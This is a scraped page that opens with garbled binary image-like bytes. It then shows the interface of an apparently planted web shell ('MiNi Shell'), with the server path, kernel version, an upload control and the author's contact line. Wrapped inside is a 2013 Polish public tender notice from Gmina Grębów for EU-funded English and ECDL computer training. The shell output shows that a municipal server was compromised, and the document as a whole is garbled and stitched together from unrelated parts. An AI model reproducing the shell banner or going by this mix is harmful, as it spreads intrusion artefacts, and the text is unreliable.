JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/480366-N-2013.html

<p class="kh_header"><b>Grębów: Zakup usług szkoleniowych w  ramach projektu Nasza przyszłość w naszych własnych rękach.</b><br>
<b>Numer ogłoszenia: 480366 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grębów , Grębów 394, 39-410 Grębów, woj. podkarpackie, tel. 15 8513764, 8112715, faks 15 8112805.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grebow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług szkoleniowych w  ramach projektu Nasza przyszłość w naszych własnych rękach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.Przedmiotem zamówienia jest: zakup usług szkoleniowych w  ramach projektu  Nasza przyszłość w naszych własnych rękach. Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.6- Upowszechnienie uczenia się dorosłych, Poddziałanie  9.6.2 Podwyższanie kompetencji osób dorosłych w zakresie ICT i znajomości języków obcych. 
3.1. Przedmiot zamówienia podzielony został na 2 części: 
Część  nr 1:
Zorganizowanie i przeprowadzenie usługi szkoleniowej z zakresu języka angielskiego i przeprowadzenie egzaminów TELC (lub równoważnych).
1.Zorganizowanie i przeprowadzenie usługi szkoleniowej z zakresu języka angielskiego dla 48 uczestników w ramach 4 grup szkoleniowych (po 12 osób grupa) . Zajęcia w wymiarze 180h/grupę, w okresie od grudnia 2013r do listopada.2014r. Wykonawca ma obowiązek:
1.1	Przeprowadzenie egzaminu TELC lub równoważnego na odpowiednim poziomie zaawansowania (A) oraz zapewnienie certyfikatów uczestnikom którzy zaliczyli egzamin

2 Trener-trenerzy prowadzący kurs ostatnie 20 godzin zajęć w każdej grupie przeznaczy w szczególności na przygotowanie uczestników kursu do egzaminów TELC, w tym m.in. będzie przeprowadzał w trakcie zajęć przykładowe zestawy egzaminów TELC, ćwiczenia, które występują na egzaminie, omówi zasady i elementy egzaminów.  
3  Zamawiający zastrzega sobie prawo do zmiany okresu realizacji szkoleń językowych.
4 Zajęcia z języka angielskiego mają być prowadzone metodą komunikacyjną, która rozwija skuteczne porozumiewania się. W trakcie zajęć mają być wykorzystywane nagrania do ćwiczeń, poleceń lub rozmówek w języku angielskim. Trener będzie w trakcie zajęć zlecał wykonywanie ćwiczeń wykonywanych w parach, ćwiczeń fonetycznych, pracę z podręcznikiem , a także będzie wyznaczał ćwiczenia, które należy wykonać w domu.
5	Wykonawca w terminie 10 dni roboczych od dnia podpisania umowy dostarczy Zamawiającemu programy szkoleń językowych dla każdej grupy, które będą obejmować 180 godzin zajęć.
6	Wykonawca zobowiązany jest przed rozpoczęciem zajęć językowych w danej grupie do przeprowadzenia pretestów oraz po zakończeniu wszystkich zaplanowanych zajęć dla danej grupy w danym roku do przeprowadzenia posttestów. Opracowanie i wydruk pretestów i posttestów leży po stronie Wykonawcy. Przeprowadzenie pretestów i posttestów ma mieć na celu zbadanie przyrostu znajomości języka angielskiego w wyniku udziału w szkoleniu językowym. Trener prowadzący szkolenie językowe jest zobowiązany dokonać oceny pretestów i posttestów, a oryginały pretestów i posttestów w terminie 10 dni roboczych od dnia przeprowadzenia pretestów i postestów dostarczyć Zamawiającemu.
7 Co najmniej raz na dwa miesiące trenerzy prowadzący zajęcia będą w każdej grupie przeprowadzać testy/sprawdziany wiedzy, które umożliwią ocenę postępów w nauce. 
8	Trener prowadzący dane szkolenie jest zobowiązany do bieżącego prowadzenia listy obecności i przekazania oryginału Zamawiającemu  w terminie 10 dni po zakończeniu każdego miesiąca zajęć.
9 Egzaminy TELC zostaną przeprowadzone w terminie wspólnie uzgodnione między Zamawiającym a Wykonawcą.
10 Egzamin TELC, o którym mowa powyżej to egzamin językowy stworzony w oparciu o Europejski System Opisu Kształcenia Językowego, uznawany i akredytowany w wielu krajach europejskich, również w Polsce.
11 Egzamin TELC ma przeprowadzić bezpośrednio Wykonawca jako licencjonowane centrum/ośrodek egzaminacyjny TELC (Wykonawca musi być licencjonowanym centrum/ośrodkiem egzaminacyjnym TELC).
12 Osoby, które zdadzą pozytywnie egzamin TELC otrzymają Europejski Certyfikat Językowy TELC.
13 Zamawiający zapewni wszystkie warunki organizacyjne i sprzęt niezbędny do przeprowadzenia egzaminów, o których mowa powyżej.
14 Wykonawca dostarczy do Zamawiającego kserokopie certyfikatów wydanych uczestnikom projektu.
15	Wykonawca zorganizuje i przeprowadzi egzaminy TELC w miejscowości w której prowadzone było szkolenie
16	Wykonawca poniesie wszystkie koszty związane z organizacją i przeprowadzeniem egzaminów TELC.

Część nr 2 
Zorganizowanie i przeprowadzenie szkoleń komputerowych zgodnie z syllabusem ECDL START i przeprowadzenie egzaminów ECDL START lub równoważnych

1. Zorganizowanie i przeprowadzenie usługi szkoleniowej - szkolenia komputerowe prowadzone zgodnie z syllabusem ECDL opracowanym przez Polskie Towarzystwo Informatyczne dla 20 osób (2 grupy po 10 osób). Usługa szkoleniowa będzie odbywać się w okresie grudnia 2013 r do października 2014r. w godzinach ustalonych z uczestnikami tak, by nie kolidowały one z ich obowiązkami.
1.	Szkolenie dla 1 grupy będzie trwać 120 godzin . 
3.  Wykonawca zobowiązany jest do organizacji dodatkowego modułu szkoleniowego w formie elearningowej z wykorzystaniem udostępnionej przez Wykonawcę słuchaczom porzez internet platformy do szkoleń elearningowych. Wykonawca zobowiązany jest do udostępnienia słuchaczom na platformie interaktywnych materiałów  za zakresu technik komputerowych w podziale tematycznym zgodnym z modułowym podziałem ECDL. Wykładowcy Wykonawcy zobowiązani są do prowadzenia zajęć z wykorzystaniem e-nauczania w wymiarze min. 5h dla każdego słuchacza.
4. Szkolenia komputerowe będą miały na celu przygotowanie do egzaminu ECDL Start. Wykonawca będzie zobowiązany opracować i realizować program szkolenia według syllabusu ECDL.
5. Zakres tematyczny każdego szkolenia będzie obejmować 4 spośród poniższych modułów:
Podstawy technik informatycznych - 16 godzin (2 dni szkoleniowe)
Użytkowanie komputerowe - 16 godzin (2 dni szkoleniowe)
Przetwarzanie tekstów - 16 godzin (2 dni szkoleniowe)
Arkusze kalkulacyjne- 16 godzin (2 dni szkoleniowe)
Bazy danych- 16 godzin (2 dni szkoleniowe)
Grafika menedżerska i prezentacyjna - 16 godzin (2 dni szkoleniowe)
Usługi w sieciach informatycznych - 16 godzin (2 dni szkoleniowe)
Spośród powyższych modułów na 2 dni przed planowanym terminem rozpoczęcia szkolenia Zamawiający wskaże Wykonawcy 4 moduły, jakie wybrała dana grupa (każda grupa może wybrać inne moduły). Wykonawca będzie zobowiązany prowadzić szkolenia z modułów wskazanych przez Zamawiającego.
6. Trener prowadzący szkolenie ostatnie 4 godzin zajęć w każdej grupie przeznaczy w szczególności na przygotowanie uczestników szkolenia do egzaminu ECDL Start, w tym m.in. będzie przeprowadzał przykładowe zestawy egzaminów ECDL Start, ćwiczenia, które występują na egzaminie, omówi zasady i elementy egzaminu.
7. Zamawiający zastrzega sobie prawo do zmiany okresu realizacji szkoleń komputerowych.
8. Wykonawca jest zobowiązany przekazać na własność każdemu uczestnikowi szkolenia podręcznik/ki, które będą obejmować tematykę realizowanych modułów szkoleń. Wykonawca jest zobowiązany jeden egzemplarz materiałów dydaktycznych przygotowanych dla danej grupy przekazać Zamawiającemu najpóźniej w terminie 3 dni przed rozpoczęciem szkolenia dla danej grupy. 
9. Wykonawca zobowiązany jest przed rozpoczęciem szkolenia w danej grupie do przeprowadzenia pretestów oraz po zakończeniu wszystkich zaplanowanych zajęć dla danej grupy w danym roku do przeprowadzenia posttestów. Opracowanie i wydruk pretestów i posttestów leży po stronie Wykonawcy. Przeprowadzenie pretestów i posttestów ma mieć na celu zbadanie przyrostu umiejętności i wiedzy z zakresu ICT w wyniku udziału w szkoleniu komputerowym. Trener prowadzący szkolenie komputerowe jest zobowiązany dokonać oceny pretestów i posttestów, a oryginały pretestów i posttestów w terminie 10 dni roboczych od dnia przeprowadzenia pretestów i postestów dostarczyć Zamawiającemu.
10. Pretest, o którym mowa powyżej ma jednocześnie posiadać znamiona ankiety, która umożliwi trenerowi określenie znajomości obsługi komputera u uczestników szkoleń. Na podstawie wyników pretestów trener dostosuje tempo szkoleń do potrzeb uczestników projektu. 
11. Szkolenia komputerowe prowadzone zgodnie z syllabusem ECDL mają być prowadzone poprzez wykłady, ćwiczenia, case study, tak by uczestnicy szkoleń nabyli umiejętności praktyczne przydatne w pracy.
12. Trener prowadzący dane szkolenie jest zobowiązany do bieżącego prowadzenia listy obecności i przekazania oryginału Zamawiającemu  w terminie 10 dni po zakończeniu każdego miesiąca zajęć.
13. Wykonawca w ramach swojej usługi zorganizuje i przeprowadzi w miejscu prowadzenia szkoleń egzaminy ECDL Start dla wszystkich uczestników szkolenia. 
19. Egzaminy zostaną przeprowadzone w terminie wspólnie uzgodnione między Zamawiającym a Wykonawcą.
20. Egzamin ECDL Start ma przeprowadzić certyfikowane centrum egzaminacyjne ECDL (Wykonawca może być certyfikowanym centrum egzaminacyjnym ECDL lub Wykonawca może zlecić przeprowadzenie egzaminów ECDL certyfikowanemu centrum egzaminacyjnemu). Wykonawca jest zobowiązany zapewnić wszystkie warunki organizacyjne i techniczne niezbędne do przeprowadzenia egzaminów ECDL Start.
21. Osoby, które zdadzą pozytywnie egzamin ECDL Start otrzymają Europejski Certyfikat Umiejętności Komputerowych, który jest honorowany na terenie Unii Europejskiej.
22. Wykonawca dostarczy do Zamawiającego kserokopie certyfikatów wydanych uczestnikom projektu.
3.2. Zamawiający udostępnia sale do przeprowadzenia zajęć- GCK  w Grębowie.

3.6. WYMAGANIA I OBOWIĄZKI DOTYCZĄCE WYKONAWCÓW 
3.6.1. Spełnienie wymogów dotyczących wykształcenia.
3.6.2. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb
w odniesieniu do problematyki projektu i jego uczestników.
3.6.3. Opracowanie harmonogramu zajęć i przedstawienie do zatwierdzenia Zamawiającemu przed podpisaniem umowy. 
3.6.4. Opracowanie i realizacja programów zajęć, ukierunkowanych na realizację celów Projektu.
3.6.5. Prowadzenie dokumentacji (m.in. dzienników zajęć, list obecności na zajęciach).
3.6.6. Sporządzanie sprawozdań z realizacji projektu, opracowywanie, przeprowadzanie 
i analiza testów kompetencji (badanie osiągnięć), sprawdzianów lub innej formy oceny dającej możliwości sprawdzenia przyrostu wiedzy i umiejętności uczniów objętych wsparciem- na początku realizacji zajęć, w trakcie oraz na zakończenie projektu i przekazywanie Zamawiającemu.
3.6.7. Promocja i ewaluacja projektu - informowanie o współfinansowaniu projektu 
ze środków Europejskiego Funduszu Społecznego.
3.6.8. Ponoszenie odpowiedzialności materialnej za powierzone mienie.
3.6.9. Przestrzeganie regulaminu obowiązującego w pracowni, w której prowadzi zajęcia.
3.6.10. Decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć.
3.6.11. Przestrzeganie Wytycznych dotyczących oznaczania projektu w ramach POKL.
3.6.12. Współpraca z zespołem projektowym.
3.6.13. Wykonywanie innych bieżących zadań niezbędnych do prawidłowej realizacji projektu.
3.6.14. Wykonawca zobowiązany jest do informowania Koordynatora Projektu o wszelkich  odstępstwach od harmonogramu realizacji zajęć.
3.6.15. Udostępnienie całej dokumentacji z zakresu realizacji umowy (np. prac dzieci wytworzonych 
w trakcie prowadzonych zajęć), na żądanie uprawnionego przedstawiciela Zamawiającego lub organom kontrolującym.
3.6.16. Wykonawca ponosi pełną odpowiedzialność  uczestników w czasie trwania zajęć.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.40.00.00-8, 80.58.00.00-3, 80.53.32.00-1, 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykonawca wykaże, że  w okresie ostatnich trzech lat przed złożeniem oferty, a jeśli okres ich działalności jest krótszy - w tym okresie wykonał co najmniej:
a.	Dla zadania nr 1 - jednej usługi szkoleniowej  z zakresu języka angielskiego w wymiarze co najmniej 180h szkoleniowych dla każdej grupy zakończone przeprowadzeniem egzaminu TELC lub równoważnego, obejmujące co najmniej 12 uczestników w każdej usłudze. 
b.	Dla zadania nr 2 - jednej sługi szkoleniowej z zakresu technik komputerowych w wymiarze co najmniej 120h szkoleniowych dla każdej grupy wspomagane modułem elearningowym poprzez udostępnienie uczestnikom interaktywnych materiałów szkoleniowych na platformie elearningowej, w wymiarze co najmniej 5h/uczestnika, zakończone przeprowadzeniem egzaminu ECDL-Start lub równoważnego, obejmujące co najmniej 10 uczestników w każdej usłudze.
Informacje o wykonanych usługach Wykonawca zobowiązany jest zawrzeć w załączniku nr 5a i 5b</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian w umowie 1.Zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy.
2. Zmiana osób, które będą uczestniczyć w wykonaniu zamówienia w szczególności w przypadku choroby osoby, która będzie prowadziła zajęcia lub innych zdarzeń losowych uniemożliwiających prowadzenie zajęć. Zmiany umowy mogą zostać dokonane wyłącznie w przypadku Wykonawcy, który prowadzi działalność gospodarcza pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany, przedłożenia dokumentów potwierdzających kwalifikacje osoby, która będzie prowadziła zajęcia oraz wyrażenia zgody Zamawiającego na tę zmianę. W przypadku Wykonawcy, który jest osobą fizyczną nie prowadzącą działalności gospodarczej na skutek zaistnienia okoliczności uniemożliwiających prowadzenie zajęć np. choroba umowa ulega rozwiązaniu, a w przypadku śmierci wygasa.
3. W przypadku wystąpienia niezależnych od Zamawiającego, niemożliwych do przewidzenia w trakcie zawierania umowy okoliczności takich jak np. klęski żywiołowe, znacząca absencja chorobowa dzieci, itp. Zamawiający ma prawo do zmniejszenia zakresu realizacji przedmiotu umowy do aktualnie niezbędnych swoich potrzeb lub zawieszenia świadczenia usług, na okres, w którym okoliczności te występują.
4.Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
5.Zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych.
6.Zmniejszenie zakresu usług i wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia.
7.Zmiana harmonogramu realizacji projektu w przypadku zaistnienia zmian wytycznych, zmian warunków realizacji projektu lub treści dokumentów programowych oraz zmian organizacyjnych w pracy szkoły.
8.W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
9.W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Zamawiający zobowiązany jest do niezwłocznego poinformowania na piśmie 
o tym fakcie Wykonawcy i  wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
10.Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę, jako stanowiące podstawę do zmiany umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie. Zmiana umowy może nastąpić 
w formie pisemnej, pod rygorem nieważności takiego oświadczenia.
11. Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grebow.un.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminne Centrum Kultury w Grębowie   
39-410 Grębów 394 
Alicja Kubiak  tel - 15 811 27 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 09:30, miejsce: Urząd Gminy Grębów 
39-410 Grębów 394 
pok. nr 12 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.6- Upowszechnienie uczenia się dorosłych, Poddziałanie  9.6.2 Podwyższanie kompetencji osób dorosłych w zakresie ICT i znajomości języków obcych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com